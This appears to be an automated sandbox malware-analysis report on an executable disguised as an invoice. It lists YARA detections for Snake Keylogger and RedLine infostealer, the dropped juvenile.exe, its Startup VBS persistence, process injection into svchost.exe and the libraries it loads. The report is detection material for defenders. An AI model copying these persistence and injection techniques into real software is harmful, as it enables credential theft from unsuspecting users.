Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: FACT0987789000900.exe	Static PE information: Section: UPX1 ZLIB complexity 0.9888239459509658
Source: juvenile.exe.3.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9888239459509658

Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, -R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, -R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.svchost.exe.7e90000.4.raw.unpack, -R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.svchost.exe.326df20.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.svchost.exe.326df20.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: juvenile.exe, 00000006.00000002.1321448784.000000000152E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: BS;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004DCE7A GetLastError,FormatMessageW,

3_2_004DCE7A

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004CAB84 AdjustTokenPrivileges,CloseHandle,	3_2_004CAB84
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004CB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	3_2_004CB134
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0090AB84 AdjustTokenPrivileges,CloseHandle,	6_2_0090AB84
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0090B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_0090B134

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004DE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

3_2_004DE1FD

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004D6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

3_2_004D6532

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004EC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

3_2_004EC18C

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_0049406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

3_2_0049406B

Source: C:\Users\user\Desktop\FACT0987789000900.exe

File created: C:\Users\user\AppData\Local\thixolabile

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\FACT0987789000900.exe

File created: C:\Users\user~1\AppData\Local\Temp\autC090.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000008.00000002.2547584481.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057C9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A14000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A06000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FACT0987789000900.exe	ReversingLabs: Detection: 71%
Source: FACT0987789000900.exe	Virustotal: Detection: 80%

Source: C:\Users\user\Desktop\FACT0987789000900.exe

File read: C:\Users\user\Desktop\FACT0987789000900.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACT0987789000900.exe "C:\Users\user\Desktop\FACT0987789000900.exe"
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Process created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\Desktop\FACT0987789000900.exe"
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FACT0987789000900.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Process created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\Desktop\FACT0987789000900.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FACT0987789000900.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
